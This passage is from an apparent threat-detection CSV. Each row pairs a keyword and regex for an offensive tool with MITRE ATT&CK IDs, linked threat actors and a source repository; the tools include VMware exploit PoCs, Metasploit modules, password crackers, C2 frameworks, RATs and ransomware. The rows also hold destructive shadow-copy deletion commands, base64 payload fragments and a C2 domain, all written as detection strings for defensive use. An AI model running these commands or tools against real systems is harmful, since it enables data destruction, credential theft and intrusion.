VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","N/A","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","62237" "*VMware 
detected!!!*",".{0,1000}VMware\sdetected!!!.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","62238" "*vmware_vcenter_uploadova_rce*",".{0,1000}vmware_vcenter_uploadova_rce.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#content","N/A","7","10","N/A","N/A","N/A","N/A","62239" "*vmware_view_planner*uploadlog_rce*",".{0,1000}vmware_view_planner.{0,1000}uploadlog_rce.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62240" "*vmware_vrni_rce_cve_2023_20887.rb*",".{0,1000}vmware_vrni_rce_cve_2023_20887\.rb.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","N/A","3","232","43","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z","62241" "*vmware_workspace_one_access_cve_*.rb",".{0,1000}vmware_workspace_one_access_cve_.{0,1000}\.rb","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb","1","1","N/A","N/A","N/A","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62242" "*VMware-vRealize-Log-Insight.cert*",".{0,1000}VMware\-vRealize\-Log\-Insight\.cert.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware 
vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","N/A","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","62243" "*vmx2john.py*",".{0,1000}vmx2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","62244" "*VmxaU1MyVnJNVmRXYTJSaFRUSlNjRlZ0ZEdGWGJGSldXa2M1Vmxac2NGWlZiWGhMV1ZVeFZsTnNWbFpXYlUxNFYxWlZlR05YU2tWVGJHaG9ZVEk0ZDFkWGRHRmpiVlpZVW10c2FWSXllRTlaVjNSaFpXeFplRmR0T1ZkTlJFWkpWVEp3VjFReFpFbFJiV2hYVFVaYU1scFdXbXRqTVhCSlZHMTRWMkpZWTNoV1IzaHJaREpHVmsxWVJsSmliRnBUVkZjMVVrMUdWWGhYYkVw*",".{0,1000}VmxaU1MyVnJNVmRXYTJSaFRUSlNjRlZ0ZEdGWGJGSldXa2M1Vmxac2NGWlZiWGhMV1ZVeFZsTnNWbFpXYlUxNFYxWlZlR05YU2tWVGJHaG9ZVEk0ZDFkWGRHRmpiVlpZVW10c2FWSXllRTlaVjNSaFpXeFplRmR0T1ZkTlJFWkpWVEp3VjFReFpFbFJiV2hYVFVaYU1scFdXbXRqTVhCSlZHMTRWMkpZWTNoV1IzaHJaREpHVmsxWVJsSmliRnBUVkZjMVVrMUdWWGhYYkVw.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62245" 
"*vnc_password_osx.md*",".{0,1000}vnc_password_osx\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62246" "*vnc_passwords.txt*",".{0,1000}vnc_passwords\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62247" "*vncdumpdll*",".{0,1000}vncdumpdll.{0,1000}","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62248" "*vncinject.rb*",".{0,1000}vncinject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62249" "*VNC-NoAuth -ComputerName * -Port *",".{0,1000}VNC\-NoAuth\s\-ComputerName\s.{0,1000}\s\-Port\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","62250" "*vncpcap2john.*",".{0,1000}vncpcap2john\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","62252" "*vncpwdump.*",".{0,1000}vncpwdump\..{0,1000}","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62253" "*VNCViewer.exe /password AutoRDPwn 
*",".{0,1000}VNCViewer\.exe\s\/password\sAutoRDPwn\s.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","62258" "*vnperistence.py*",".{0,1000}vnperistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","62261" "*VoidFunc is an exported function used with PowerSploit's 
Invoke-ReflectivePEInjection.ps1*",".{0,1000}VoidFunc\sis\san\sexported\sfunction\sused\swith\sPowerSploit\'s\sInvoke\-ReflectivePEInjection\.ps1.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","62262" "*VolumeShadowCopyTools.ps1*",".{0,1000}VolumeShadowCopyTools\.ps1.{0,1000}","offensive_tool_keyword","Powersploit","PowerSploit contains a PowerShell script which utilizes the volume shadow copy service to create a new volume that could be used for extraction of files","T1003 - T1103 - T1213","TA0006 - TA0009 - TA0010","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Collection","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62265" "*VolumeShadowCopyTools.ps1*",".{0,1000}VolumeShadowCopyTools\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","62266" "*Volumiser.exe --image*",".{0,1000}Volumiser\.exe\s\-\-image.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard 
disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","62267" "*Volumiser\DiscUtils.Ebs\EbsMappedStream*",".{0,1000}Volumiser\\DiscUtils\.Ebs\\EbsMappedStream.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","62268" "*voukatas/Commander*",".{0,1000}voukatas\/Commander.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","62269" "*VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE*",".{0,1000}VPe\/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#content","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","62270" "*vpfxasdwnuewedfn.azurewebsites.net*",".{0,1000}vpfxasdwnuewedfn\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - 
TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","62271" "*vq@QyHZx.xsz*",".{0,1000}vq\@QyHZx\.xsz.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62272" "*v-Q8Q~fEXAMPLEEXAMPLEDsmKpQw_Wwd57-albMZ*",".{0,1000}v\-Q8Q\~fEXAMPLEEXAMPLEDsmKpQw_Wwd57\-albMZ.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","62273" "*VqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAByxaEKNqTPWTakz1k2pM9ZP9xLWRGkz1k/3FpZJqTPWT/cXFkhpM9ZNqTOWeikz1k/3ExZs6TPWT/cW1k3pM9ZP9xeWTekz1lSaWNoNqTPWQAAAAAAAAAAUEUAAEwBBAA8EQBSAAAAAAAAAADgAAMBCwEJAAAcAg*",".{0,1000}VqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAByxaEKNqTPWTakz1k2pM9ZP9xLWRGkz1k\/3FpZJqTPWT\/cXFkhpM9ZNqTOWeikz1k\/3ExZs6TPWT\/cW1k3pM9ZP9xeWTekz1lSaWNoNqTPWQAAAAAAAAAAUEUAAEwBBAA8EQBSAAAAAAAAAADgAAMBCwEJAAAcAg.{0,1000}","offensive_tool_keyword","susinternals","python implementation of PSExec native service implementation","T1569.002 - T1021.002 - T1035","TA0002 - TA0004 - TA0008 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/susinternals","1","0","#base64","N/A","7","2","194","18","2025-02-11T09:34:50Z","2025-02-10T07:40:36Z","62274" 
"*vRealizeLogInsightRCE*",".{0,1000}vRealizeLogInsightRCE.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","N/A","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","62275" "*Vsaver-Rat v.0.1.exe*",".{0,1000}Vsaver\-Rat\sv\.0\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","62280" "*vssadmin delete shadows /all /quiet >nul*",".{0,1000}vssadmin\sdelete\sshadows\s\/all\s\/quiet\s\>nul.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - 
TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","62283" "*vssadmin delete shadows /all /quiet*",".{0,1000}vssadmin\sdelete\sshadows\s\/all\s\/quiet.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","62284" "*vssadmin delete shadows /for=%systemdrive% /all /quiet*",".{0,1000}vssadmin\sdelete\sshadows\s\/for\=\%systemdrive\%\s\/all\s\/quiet.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","62286" "*vssadmin delete shadows /shadow=*",".{0,1000}vssadmin\sdelete\sshadows\s\/shadow\=.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","62287" 
"*vssenum.x64.*",".{0,1000}vssenum\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","62293" "*vssenum.x86.*",".{0,1000}vssenum\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","62294" "*vtiger_crm_upload_exploit*",".{0,1000}vtiger_crm_upload_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","62296" "*vulfocus/spring-core-rce-*",".{0,1000}vulfocus\/spring\-core\-rce\-.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","N/A","4","394","194","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z","62297" "*vulmon*Vulmap*",".{0,1000}vulmon.{0,1000}Vulmap.{0,1000}","offensive_tool_keyword","Vulmap","Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. 
